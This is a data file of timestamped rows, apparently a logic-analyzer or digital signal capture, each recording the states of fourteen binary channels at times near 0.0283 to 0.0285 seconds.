0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234996e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8235004e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8235048e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8235072e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8235076e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235080e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235124e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235148e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235196e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235220e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235272e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235296e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235348e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235372e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235396e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235420e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235444e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235472e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235496e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235548e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235572e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235620e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235644e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235672e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235696e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235868e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235892e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8235920e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8235944e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8360252e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8360476e-02 1,1,1,0,0,0,0,0,0,0,0,1,0,1,2.8360544e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8360564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8360860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8360884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8360904e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8360928e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8360948e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8360972e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8360996e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8361020e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8361040e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8361060e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,1,2.8361068e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8361084e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8361108e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8361132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361140e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361152e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361172e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361196e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361220e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361244e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361268e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361296e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361324e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361348e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361372e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361396e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361420e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8361428e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8361476e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8361500e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361524e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8361556e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8361584e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8361628e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8361652e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361660e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361676e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361700e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361720e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361740e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361764e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361832e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361856e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361880e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361904e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8361956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8361980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362004e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362032e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362164e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362188e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8362192e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8362236e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8362260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362268e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362288e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362308e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362336e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362364e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362384e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362436e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362460e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362560e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362584e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362612e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362636e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362660e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362708e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8362716e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8362760e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8362784e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362792e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362836e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362888e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8362908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8362932e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8362940e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8362988e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8363012e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363020e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363036e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363060e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8363064e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8363112e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8363140e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8363144e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363148e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363220e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363268e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363292e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363348e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,2.8363372e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8363376e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8363428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363460e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363560e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363584e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363612e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363636e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8363644e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8363660e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8363688e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8363712e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8363740e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363744e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363788e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363812e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363888e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363912e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8363964e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8363988e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364012e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364036e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364112e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364140e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364164e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364188e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364212e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364236e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364288e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364312e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8364340e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8364388e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8364412e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364420e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364440e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364464e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364492e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364516e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364540e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364588e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364612e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8364620e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8364668e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8364692e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8364696e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364700e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364716e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364740e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364764e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364840e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364864e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8364892e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8364940e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8364964e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8364972e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8364988e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365012e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365040e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365064e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365092e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365116e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365140e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365212e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365240e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365264e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365268e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8365316e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365340e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365348e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365364e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365388e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365412e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365440e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365464e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365492e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8365540e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365564e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365572e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365588e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365612e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365640e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365664e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365692e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365716e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365740e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365764e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,2.8365768e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365772e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8365816e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365840e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8365844e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8365848e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8365864e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365892e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8365940e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8365964e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8365988e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8366012e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8366040e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8366064e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8366068e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366072e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366116e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366140e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366164e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366188e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366212e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366240e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366264e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366292e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366316e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366340e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366364e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366388e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366412e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366440e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366464e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366492e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366516e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366540e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8366544e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8366588e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8366612e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366620e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366640e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366664e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8366668e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8366716e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8366740e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366748e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366764e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366812e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366840e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366864e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366892e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8366916e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8366940e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8366944e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8366988e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8367012e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367020e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367040e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367064e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367092e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367116e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367140e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367188e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367212e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367240e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367264e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367292e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367316e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367340e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367364e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367388e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367440e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367464e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367492e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367516e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367540e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367588e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367612e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367640e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367664e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367692e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367716e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367740e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367764e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367788e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367812e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8367836e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8367860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8492156e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,2.8492368e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.8492372e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8492388e-02 0,0,0,1,0,0,0,0,0,0,0,1,0,1,2.8492420e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8492444e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8492760e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8492788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8492812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8492836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8492860e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8492888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8492912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.8492940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.8492964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8492988e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8492992e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8493036e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8493060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493068e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493112e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493260e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493312e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493388e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8493392e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8493436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8493460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493468e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493512e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8493516e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.8493564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8493588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493596e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493660e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493688e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493712e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8493964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8493988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494112e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.8494164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.8494188e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.8494192e-02 